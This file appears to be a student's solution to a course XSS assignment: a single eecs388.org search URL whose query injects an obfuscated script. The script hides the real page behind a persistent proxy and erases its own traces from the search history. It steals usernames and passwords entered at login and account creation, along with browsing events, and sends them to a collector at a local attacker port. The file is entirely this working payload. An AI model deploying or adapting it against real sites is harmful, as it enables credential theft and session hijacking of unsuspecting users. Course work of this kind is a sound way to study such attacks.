xss_3.txt

http://eecs388.org/project2/search?xssdefense=3%20&g=1&q=%3Cscript%3Efunction%20payload(attacker)%7B%0Afunction%20log(data)%7B%0Aconsole.log(%24.param(data))%20%0A%24.get(attacker%2BString.fromCharCode(115%2C116%2C111%2C108%2C101%2C110)%2Cdata)%20%0A%7D%0Afunction%20proxy(href%2CqVal%2ChVal)%7B%0A%24(String.fromCharCode(104%2C116%2C109%2C108)).load(href%2Cfunction()%7B%0Avar%20logO%3D%7Bevent%3A%20String.fromCharCode(110%2C97%2C118)%7D%20%0Avar%20logUser%3D%20%24(String.fromCharCode(35%2C108%2C111%2C103%2C103%2C101%2C100%2C45%2C105%2C110%2C45%2C117%2C115%2C101%2C114)).text()%20%0Aif(logUser)logO%5BString.fromCharCode(117%2C115%2C101%2C114)%5D%3DlogUser%20%0AlogO%5BString.fromCharCode(117%2C114%2C108)%5D%3Dhref%20%0Alog(logO)%20%0A%24(String.fromCharCode(104%2C116%2C109%2C108)).append(String.fromCharCode(60%2C115%2C99%2C114%2C105%2C112%2C116)%2BString.fromCharCode(62)%2Bpayload.toString()%2BString.fromCharCode(59%2C60%2C47%2C115%2C99%2C114%2C105%2C112%2C116)%2BString.fromCharCode(62))%20%0A%24(String.fromCharCode(46%2C104%2C105%2C115%2C116%2C111%2C114%2C121%2C45%2C105%2C116%2C101%2C109)).each(function(elm)%7B%0Aif(%24(this).text().indexOf(String.fromCharCode(102%2C117%2C110%2C99%2C116%2C105%2C111%2C110%2C32%2C112%2C97%2C121%2C108%2C111%2C97%2C100%2C40))%3E%3D%200)%7B%0A%24(this).remove()%20%0A%7D%0A%7D)%0A%24(String.fromCharCode(35%2C113%2C117%2C101%2C114%2C121)).val(qVal)%20%0A%24(String.fromCharCode(35%2C104%2C105%2C115%2C116%2C111%2C114%2C121%2C45%2C108%2C105%2C115%2C116)).html(hVal)%20%0A%24(String.fromCharCode(35%2C98%2C117%2C110%2C103%2C108%2C101%2C45%2C108%2C110%2C107)).on(String.fromCharCode(99%2C108%2C105%2C99%2C107)%2Cfunction(event)%7B%0Aevent.preventDefault()%20%0Avar%20g%3DString.fromCharCode(47%2C112%2C114%2C111%2C106%2C101%2C99%2C116%2C50%2C47)%20%0Aif(location.pathname!%3Dg)%7B%0Ahistory.pushState(%7B%7D%2CString.fromCharCode(34)%2Cg)%20%0Aproxy(g)%20%0A%7D%0A%7D)%20%0A%24(String.fromCharCode(35%2C115%2C101%2C97%2C114%2C99%2C104%2C45%2C97%2C103%2C97%2C105%2C110%2C45%2C98%2C116%2C110)).on(String.fromCharCode(99%2C108%2C105%2C99%2C107)%2Cfunction(event)%7B%0Aevent.preventDefault()%20%0Avar%20g%3DString.fromCharCode(46%2C47)%20%0Ahistory.pushState(%7B%7D%2CString.fromCharCode(34)%2C%20g)%20%0Aproxy(g)%20%0A%7D)%20%0A%24(String.fromCharCode(35%2C108%2C111%2C103%2C45%2C105%2C110%2C45%2C98%2C116%2C110)).on(String.fromCharCode(99%2C108%2C105%2C99%2C107)%2Cfunction(event)%7B%0Aevent.preventDefault()%20%0Avar%20user%3D%24(String.fromCharCode(105%2C110%2C112%2C117%2C116%2C35%2C117%2C115%2C101%2C114%2C110%2C97%2C109%2C101)).val()%20%0Avar%20pass%3D%24(String.fromCharCode(35%2C117%2C115%2C101%2C114%2C112%2C97%2C115%2C115)).val()%20%0A%24.ajax(%7B%0Atype%3AString.fromCharCode(80%2C79%2C83%2C84)%2C%0Aurl%3AString.fromCharCode(46%2C47%2C108%2C111%2C103%2C105%2C110)%2C%0Adata%3A%7Busername%3Auser%2Cpassword%3Apass%7D%0A%7D)%0A.done(function()%7B%0Alog(%7Bevent%3AString.fromCharCode(108%2C111%2C103%2C105%2C110)%2Cuser%3Auser%2Cpass%3Apass%7D)%20%0Aproxy(String.fromCharCode(46%2C47))%20%0A%7D)%20%0A%7D)%20%0A%24(String.fromCharCode(35%2C108%2C111%2C103%2C45%2C111%2C117%2C116%2C45%2C98%2C116%2C110)).on(String.fromCharCode(99%2C108%2C105%2C99%2C107)%2Cfunction(event)%7B%0Aevent.preventDefault()%20%0A%24.ajax(%7B%0Atype%3AString.fromCharCode(80%2C79%2C83%2C84)%2C%0Aurl%3AString.fromCharCode(46%2C47%2C108%2C111%2C103%2C111%2C117%2C116)%0A%7D)%0A.done(function()%7B%0Alog(%7Bevent%3AString.fromCharCode(108%2C111%2C103%2C111%2C117%2C116)%2Cuser%3AlogUser%7D)%20%0Avar%20g%3DString.fromCharCode(47%2C112%2C114%2C111%2C106%2C101%2C99%2C116%2C50%2C47)%20%0Aif(location.pathname!%3D%20g)%7B%0Ahistory.pushState(%7B%7D%2CString.fromCharCode(34)%2C%20g)%20%0A%7D%0Aproxy(g)%20%0A%7D)%20%0A%7D)%20%0A%24(String.fromCharCode(35%2C110%2C101%2C119%2C45%2C97%2C99%2C99%2C111%2C117%2C110%2C116%2C45%2C98%2C116%2C110)).on(String.fromCharCode(99%2C108%2C105%2C99%2C107)%2Cfunction(event)%7B%0Aevent.preventDefault()%20%0Avar%20user%3D%24(String.fromCharCode(105%2C110%2C112%2C117%2C116%2C35%2C117%2C115%2C101%2C114%2C110%2C97%2C109%2C101)).val()%20%0Avar%20pass%3D%24(String.fromCharCode(35%2C117%2C115%2C101%2C114%2C112%2C97%2C115%2C115)).val()%20%0A%24.ajax(%7B%0Atype%3AString.fromCharCode(80%2C79%2C83%2C84)%2C%0Aurl%3AString.fromCharCode(46%2C47%2C99%2C114%2C101%2C97%2C116%2C101)%2C%0Adata%3A%7Busername%3Auser%2Cpassword%3Apass%7D%0A%7D)%0A.done(function()%7B%0Alog(%7Bevent%3AString.fromCharCode(108%2C111%2C103%2C105%2C110)%2Cuser%3Auser%2Cpass%3Apass%7D)%20%0Aproxy(String.fromCharCode(46%2C47))%20%0A%7D)%20%0A%7D)%20%0A%24(String.fromCharCode(35%2C115%2C101%2C97%2C114%2C99%2C104%2C45%2C98%2C116%2C110)).on(String.fromCharCode(99%2C108%2C105%2C99%2C107)%2Cfunction(event)%7B%0Aevent.preventDefault()%20%0Avar%20obj%3Dhistory.state%20%0Aobj%5BString.fromCharCode(113%2C117%2C101%2C114%2C121)%5D%3D%24(String.fromCharCode(35%2C113%2C117%2C101%2C114%2C121)).val()%20%0Ahistory.replaceState(obj%2CString.fromCharCode(34)%2Clocation.pathname)%20%0Avar%20g%3DString.fromCharCode(46%2C47%2C115%2C101%2C97%2C114%2C99%2C104%2C63%2C113%2C61)%2BencodeURIComponent(%24(String.fromCharCode(35%2C113%2C117%2C101%2C114%2C121)).val()).replace(%2F%2520%2Fg%2CString.fromCharCode(43))%20%0Ahistory.pushState(obj%2CString.fromCharCode(34)%2Cg)%20%0Aproxy(g)%20%0A%7D)%20%0A%24(String.fromCharCode(46%2C104%2C105%2C115%2C116%2C111%2C114%2C121%2C45%2C105%2C116%2C101%2C109%2C46%2C108%2C105%2C115%2C116%2C45%2C103%2C114%2C111%2C117%2C112%2C45%2C105%2C116%2C101%2C109)).on(String.fromCharCode(99%2C108%2C105%2C99%2C107)%2Cfunction(event)%7B%0Aevent.preventDefault()%20%0Avar%20obj%3Dhistory.state%20%0Aobj%5BString.fromCharCode(104%2C86%2C97%2C108)%5D%3D%24(String.fromCharCode(35%2C104%2C105%2C115%2C116%2C111%2C114%2C121%2C45%2C108%2C105%2C115%2C116)).html()%20%0Ahistory.replaceState(obj%2CString.fromCharCode(34)%2Clocation.pathname%2Blocation.search)%20%0Avar%20g%3DString.fromCharCode(46%2C47%2C115%2C101%2C97%2C114%2C99%2C104%2C63%2C113%2C61)%2BencodeURIComponent(%24(this).text()).replace(%2F%2520%2Fg%2CString.fromCharCode(43))%20%0Ahistory.pushState(%7B%7D%2CString.fromCharCode(34)%2Cg)%20%0Aproxy(g)%20%0A%7D)%20%0A%24(String.fromCharCode(104%2C116%2C109%2C108)).show()%20%0A%7D)%20%0A%7D%0A%24(String.fromCharCode(104%2C116%2C109%2C108)).hide()%20%0Aproxy(String.fromCharCode(46%2C47))%20%0Ahistory.replaceState(%7B%7D%2CString.fromCharCode(34)%2CString.fromCharCode(47%2C112%2C114%2C111%2C106%2C101%2C99%2C116%2C50%2C47))%20%0A%24(window).on(String.fromCharCode(112%2C111%2C112%2C115%2C116%2C97%2C116%2C101)%2C%20function(event)%7B%0Aif(event.originalEvent.state!%3Dnull)%7B%0Aproxy(location.href%2Cevent.originalEvent.state%5BString.fromCharCode(113%2C117%2C101%2C114%2C121)%5D%2Cevent.originalEvent.state%5BString.fromCharCode(104%2C86%2C97%2C108)%5D)%20%0A%7D%0A%7D)%20%0A%7D%20payload(String.fromCharCode(104%2C116%2C116%2C112%2C58%2C47%2C47%2C49%2C50%2C55%2C46%2C48%2C46%2C48%2C46%2C49%2C58%2C51%2C49%2C51%2C51%2C55%2C47))%20%3C%2Fscript%3E